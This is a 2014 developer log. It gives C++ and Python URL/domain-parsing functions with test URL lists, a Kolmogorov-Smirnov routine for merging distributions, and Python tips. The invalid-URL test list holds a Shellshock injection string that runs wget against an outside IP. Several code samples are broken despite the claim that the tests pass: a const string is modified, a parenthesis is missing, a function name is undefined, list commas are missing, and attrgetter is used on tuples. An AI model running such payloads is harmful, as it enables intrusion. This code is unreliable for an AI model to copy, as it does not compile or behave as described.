Kalanand's December 2014 Log

   November 2014   
December 2014
SuMoTuWeThFrSa
 123456
78910111213
14151617181920
21222324252627
28293031   
   January 2015   

December 5th

Parsing domain name (SLD + TLD) from a URL string

URLs are simple things. So, you'd think it will be piece of cake to parse a URL to check if it is valid and detect its domain name. Turns out this is anything but simple.

See discussions at the following threads to get an idea of the complexities involved:
http://blog.codinghorror.com/the-problem-with-urls/
http://stackoverflow.com/questions/7160737/python-how-to-validate-a-url-in-python-malformed-or-not
http://stackoverflow.com/questions/27745/getting-parts-of-a-url-regex
https://gist.github.com/dperini/729294
https://mathiasbynens.be/demo/url-regex

Here is a C++ function to perform URL validation and extract domain name. Admittedly, it doesn't cover all possible cases but is sufficient for my current needs.

  //=====================================================
  //   Get TLD-SLD combination as a single string 
  //=====================================================
   std::string getTldSld(const std::string url, bool sld_only)
   {
      std::string defaultstr("");
      
      // Get the exact host name (strip out everything after ":")
      std::string name = extractDomainName(url);
      if(name.empty()) return defaultstr;

      // The valid characters are "-"(45), "."(46), "0" to "9" (48-57) and "a" to "z" (97-122)
      for(char& c : name) 
      {
         if( !(c==45 || c==46 || (c >47 && c<58) ||(c >96 && c<123)) ) return defaultstr;
      }
      
      // Must contain at least one "." character
      if(std::count(name.begin(), name.end(), '.') < 1) return defaultstr;

      // However, the domain name can't start with a dot or a hyphen
      if(name.at(0) == 46 || name.at(0) == 45) return defaultstr;

      // At this point I should have detected invalid URL. 
      // The only exception is a pattern like "navclient.update/en/7.5.5111.1712"  
      // which will be detected as valid URL. The only way to exclude them is 
      // to check the TLD against a known list. 

      // If it is an ip address return the whole quartet
      if(is_domain_name_ip(name)) return name;

      std::string tld, sld;
      splitExtTLDSLD(name, tld, sld); // split into sld and tld
      
      if(sld_only) 
      {
         if ( !(sld.size()==0) ) return sld;
         else return name;
      }

      std::string truncated_name(name); 
      if ( !(tld.size() == 0 && sld.size() == 0) ) {
         truncated_name = sld + "." + tld;
      }

      return truncated_name;
   } 
   

   //===============================================================
   //   Extract the exact domain name after stripping "/" and/or ":"
   //===============================================================
   std::string extractDomainName(const std::string str) 
   {
      std::string name(str);

      if(std::strcmp(name.substr(0,7).c_str(),"http://")==0) 
      {
         name = name.substr(7, std::string::npos);
      }
      else if(std::strcmp(name.substr(0,8).c_str(),"https://")==0) 
      {
         name = name.substr(8, std::string::npos);
      }
      else if(name.find(":/") != std::string::npos) return std::string();

      // Extract host name
      size_t i = name.find_first_of(':');
      if(!(i == std::string::npos)) name = name.substr(0, i);

      size_t j = name.find_first_of('/');
      if(!(j == std::string::npos)) name = name.substr(0, j);

     // convert the domain name to lowercase 
      std::transform(name.begin(), name.end(), name.begin(), 
                     (int(*)(int)) tolower); 

      return name;
    }


  //===============================================================
  //   Split the domain name into SLD + TLD 
  //===============================================================
  void splitTLDSLD(const std::string &domain, std::string &tld, std::string &sld) 
  {
      tld.clear();
      sld.clear();
      if (domain.empty()) return;

      std::vector<std::string> segments;
      size_t pos = 0;
      while ((pos = domain.find(".")) != std::string::npos) {
          segments.push_back(domain.substr(0, pos);
          domain.erase(0, pos + 1);
      }
      segments.push_back(domain);


      // *** This is wrong (too simplistic), but good enough for this example *** 
      //TLD == "the last segment", SLD == "second to last"
      size_t n = segments.size();
      tld = segments[n-1];
      sld = segments[n-2];
  }
I ran unit test on the following examples

const static std::vector validURLs 
 {
  "http://foo.com/blah_blah 1 1 1 1 1 1 1 1 1 1 1 1 1",
  "http://foo.com/blah_blah/ 1 1 1 1 1 1 1 1 1 1 1 1 1",
  "http://foo.com/blah_blah_(wikipedia) 1 1 1 1 1 1 1 1 1 0 1 1 1",
  "http://foo.com/blah_blah_(wikipedia)_(again) 1 1 1 1 1 1 1 1 1 0 1 1 1",
  "http://www.example.com/wpstyle/?p=364 1 1 1 1 1 1 1 1 1 1 1 1 1",
  "https://www.example.com/foo/?bar=baz&inga=42&quux 1 1 1 1 1 1 1 1 1 1 1 1 1",
  "http://✪df.ws/123 0 0 1 1 1 1 0 1 1 1 1 1 0",
  "http://userid:password@example.com:8080 0 1 1 1 1 0 1 1 1 1 1 1 1",
  "http://userid:password@example.com:8080/ 0 1 1 1 1 0 1 1 1 1 1 1 1",
  "http://userid@example.com 0 1 1 1 1 0 1 1 1 1 1 1 1",
  "http://userid@example.com/ 0 1 1 1 1 0 1 1 1 1 1 1 1"
  "http://userid@example.com:8080 0 1 1 1 1 0 1 1 1 1 1 1 1"
  "http://userid@example.com:8080/ 0 1 1 1 1 0 1 1 1 1 1 1 1",
  "http://userid:password@example.com 0 1 1 1 1 0 1 1 1 1 1 1 1"
  "http://userid:password@example.com/ 0 1 1 1 1 0 1 1 1 1 1 1 1",
  "http://142.42.1.1/ 0 1 1 1 1 1 1 1 1 1 1 1 1",
  "http://142.42.1.1:8080/",
  "googleads.g.doubleclick.net",
  "www.woo55.pk",
  "nicholasamanda.com/",
  "http://www.extremetech.com/wp-content/themes/extremetech/web_fonts/proximanova_regular_macroman/stylesheet.css",
  "http://111.111.11.1/key=RZMvBfF4ml6,end=1415905443/data=gUDk,138C6E7C/reftag=5412162/2/21/9/17720069/3745578.mp4",
  "http://www.thegoodscentscompany.com",
  "https://www.google.com/webhp?sourceid=chrome-instant&ion=1&espv=2&ie=UTF-8#q=percent%20encoding%20in%20url"
 };

const static std::vector invalidURLs
 {
  "ttp:// 0 0 0 0 0 0 0 0 1 0 0 0 0",
  "http://. 0 0 0 0 1 0 1 0 1 0 0 0 0",
  "http://.. 0 0 0 0 1 0 1 0 1 0 0 0 0",
  "http://../ 0 1 1 1 1 0 1 0 1 1 0 0 0",
  "http://? 0 0 0 0 1 0 0 0 1 0 0 0 0",
  "http://?? 0 0 0 0 1 0 0 0 1 0 0 0 0",
  "http://??/ 0 1 1 1 1 0 0 0 1 1 0 0 0",
  "http://# 0 0 0 1 1 0 0 0 1 1 0 0 0",
  "http://## 0 1 0 1 1 0 0 0 1 1 0 0 0",
  "http://##/ 0 1 1 1 1 0 0 0 1 1 0 0 0",
  "http://foo.bar?q=Spaces should be encoded 0 1 1 1 1 1 0 0 1 1 0 0 0",
  "// 0 0 0 0 0 0 0 0 0 0 0 0 0",
  "//a 0 0 0 0 0 0 0 0 0 0 0 0 0",
  "///a 0 0 0 0 0 0 0 0 0 0 0 0 0",
  "/// 0 0 0 0 0 0 0 0 0 0 0 0 0",
  "http:///a 0 1 1 1 1 0 0 0 1 1 0 0 0",
  "foo.com 0 0 0 0 1 0 0 0 0 0 0 0 0",
  "rdar://1234 0 0 1 1 1 0 1 0 1 0 0 0 1",
  "h://test 0 0 1 0 1 0 1 0 1 0 0 0 1",
  "http:// shouldfail.com 0 0 0 0 1 0 0 0 1 1 0 0 0",
  ":// should fail 0 0 0 0 0 0 0 0 0 0 0 0 0",
  "http://foo.bar/foo(bar)baz quux 0 1 1 1 1 1 0 0 1 1 0 0 0",
  "ftps://foo.bar/ 0 0 1 1 1 0 1 0 1 0 0 0 1",
  "http://-error-.invalid/ 0 1 1 1 1 1 1 1 1 1 0 0 0",
  "http://a.b--c.de/ 1 1 1 1 1 1 1 1 1 1 0 0 1",
  "http://-a.b.co 1 1 1 1 1 1 1 1 1 1 0 0 0",
  "http://a.b-.co 1 1 1 1 1 1 1 1 1 1 0 0 1"
  "http://0.0.0.0 0 1 1 1 1 1 1 1 1 1 1 0 1"
  "http://10.1.1.0 0 1 1 1 1 1 1 1 1 1 1 0 1",
  "http://10.1.1.255 0 1 1 1 1 1 1 1 1 1 1 0 1",
  "http://224.1.1.1 0 1 1 1 1 1 1 1 1 1 1 0 1",
  "http://1.1.1.1.1 0 1 1 1 1 1 1 1 1 1 1 0 1",
  "http://123.123.123 0 1 1 1 1 1 1 1 1 1 1 0 1",
  "http://3628126748 0 1 1 1 1 0 1 1 1 1 1 0 1",
  "http://.www.foo.bar/ 0 1 1 1 1 0 1 0 1 1 0 0 0",
  "http://www.foo.bar./ 0 1 1 1 1 1 1 1 1 1 1 0 0",
  "http://.www.foo.bar./ 0 1 1 1 1 0 1 0 1 1 0 0 0",
  "http://10.1.1.1 0 1 1 1 1 1 1 1 1 1 1 0 1",
  "http://10.1.1.254",
  "ver=1,p=2,a=2,v=2.0.0.4,id=a0fdd063b9108c0549eaba9faa897e4d,os=3,osver=6.1.7601,d=3,api=8,r=2,t=428,error=0",
  "() { :;}; echo; /usr/bin/env wget http://111.111.111.111/robots.txt?for=http://domain.example.com/~foo/bar.pl -O /dev/null;",
  "navclient.update/en/7.5.5111.1712",
  "fbapp://350685531728/newsfeed_map_view",
  "file:///Applications/Install/76C0B4DD-65A6-4A59-893B-1B929029A858/Install/",
  "file:///",
  "Referer: http://www.tumblr.com/indash_blog/peepr/pyroiceangel", 
  "KKVPVOD-5050-PPIF6NZA-KVTT-QK4E-XZSP-FCYUMFX73S7R",
  "app:/StageManager-2.5.swf",
  "app:/ReadCube.swf/[[DYNAMIC]]/1",
  "client://linewebtoon.android",
  "Conversation History View (PV)",
  "This request comes from taobao app, so refer is null.",
  "Feedspotbot: http://www.feedspot.com",
  "about:blank",
  "chrome://history/#p=0",
  "*/*",
  ""
 }

Here is a python function to extract the domain name out of the URL. It passes the unit tests with equivalent results.

import re

def extract_domain(url):
   valid = False  # assume not valid
   domain = url  # by default the domain is entire URL

   # check for schemes that we're permitting
   if url.startswith('http://'):
      domain = url[7:]

   elif url.startswith('https://'):
      domain = url[8:]

   # at this point it's either a valid scheme or a domain/IP without scheme
   if ':/' not in domain:

      # strip URL at first '/', if present
      domain = domain.split('/')[0]

      # strip port at first ':', if present
      domain = domain.split(':')[0]

      # IP or domain name must contain a dot
      if '.' in domain:
         # check if it's an IP
         if re.match('(\d{,3}\.){3}\d{,3}$', domain):
            valid = True

         # check if it contains domain name characters only
         elif re.match('[\w\d.\-]+$', domain):
            valid = True

   if valid:
      print url, '=>', domain, '[+]'
      return domain
   else:
      print url, '=> [-]'
      return None

December 9th

Aggregate similar frequency distributions together

Suppose I have a number of frequency distributions of some common quantities, each obtained from an independent dataset. I want to aggregate similar distributions together. For example, if distributions A and B are compatible with each other based on Kolmogorov-Smirnov test (let's say, at >67% probability), then I want to add their frequencies. I want to do this recursively for each pair of distributions until I am left with a minimum set of mutually incompatible distributions.

Note that each frequency distribution is a map of key-value pairs. Here is a simple python code I came up with to perform the aggregation.
## Import standard python libs 
import sys
import re
import math
import json
import subprocess
from socket import inet_aton
from operator import itemgetter
from operator import add
from collections import Counter 
from collections import defaultdict
import itertools 
import scipy.stats
from scipy.stats import ks_2samp
import numpy as np
import copy

# Minimum K.S. test probability for clustering hosts
MIN_PROB_KSTEST = 0.67

### Count total number of entries for each label
def numEntries(x):
    sums = {}
    for s in x.keys():
        sums[s] = 0
        for r in x[s].keys():
            sums[s] += x[s][r]
    return sums


### Normalize each distribution to 1
def normalizeToOne(x):
    sums = numEntries(x)
    for s in x.keys():
        for r in x[s].keys():
            x[s][r]  *= 1.0 / sums[s]
    return x


### Add two distributions: x is the container dict, 
### s1 and s2 are string labels of the two distributions
def addDistributions(x, s1, s2): 
    updated = Counter(x[s1])
    updated.update(x[s2])
    del x[s1]
    del x[s2]
    x.update({s1 + '__' + s2 : dict(updated)})


## Aggregate a pair of frequency distributions together if they are similar.  
## Use Kolmogorov-Smirnov test to check similarity. 
## The Keys of dictionary "x" are the labels of the distribution.  
def aggregate_pair_distributions(x):
    elements = x.keys()
    for i1, s1 in enumerate(elements):
        for i2, s2 in enumerate(elements): 
            if i2 < i1 and s1 in x and s2 in x: 
                (chi2, prob) = ks_2samp(x[s1].values(), x[s2].values())
                if prob > MIN_PROB_KSTEST: addDistributions(x, s1, s2)
    return x


## Aggregate all similar distributions together. 
## Recursively call the previous function until we reach final set of distributions.
def aggregate_distributions(x):
    y = x.copy()
    previous_len = len(y)
    current_len = 0

    while current_len < previous_len:
        previous_len = len(y)
        y = aggregate_pair_distributions(y)
        current_len = len(y)
        print "prev_length = ", previous_len, "current_length = ", current_len
    return normalizeToOne(y)

December 11th

Python tip of the day: sort and sorted

Python has a built-in sort() method that modifies the list in-place and a sorted() function that builds new sorted list from an iterable. Some examples follow.
>>> x = [2, 4, 1, 3, 9, 5, 8, 7, 6]
>>> print sorted(x)
[1, 2, 3, 4, 5, 6, 7, 8, 9]

>>> x.sort()
>>> print x
[1, 2, 3, 4, 5, 6, 7, 8, 9]

>>> sorted({1: 'D', 2: 'B', 3: 'B', 4: 'E', 5: 'A'})
[1, 2, 3, 4, 5]

>>> sorted("This is a test string".split())
['This', 'a', 'is', 'string', 'test']

>>> sorted("This is a test string".split(), key=str.lower)
['a', 'is', 'string', 'test', 'This']

>>> students = [('john', 'A', 15), ('jane', 'B', 12), ('dave', 'B', 10)]
>>> sorted(students, key=lambda x: x[2])  # sort by age
[('dave', 'B', 10), ('jane', 'B', 12), ('john', 'A', 15)]
Both list.sort() and sorted() accept a reverse parameter with a boolean value. For example, to get the student data in reverse age order:
>>> sorted(students, key=itemgetter(2), reverse=True)
[('john', 'A', 15), ('jane', 'B', 12), ('dave', 'B', 10)]

>>> sorted(students, key=attrgetter('age'), reverse=True)
[('john', 'A', 15), ('jane', 'B', 12), ('dave', 'B', 10)]

December 12th

Python tip of the day: syntax highlighting in python interactive shell

Ever wish you had syntax highlighting in your python interactive shell? This is available through a qt-based ipython GUI, but if you'd prefer to stay in the terminal you could use the python prompt toolkit ( https://github.com/jonathanslenders/python-prompt-toolkit). It integrates with ipython, allowing all kinds of fancy tab completion menus And has a slick multi-line editing mode.

Just do:
pip install prompt-toolkit
to install, and:
ptipython
to run. Beautiful!

Go to November's log


Last modified: Wed Mar 26 11:51:06 CST 2014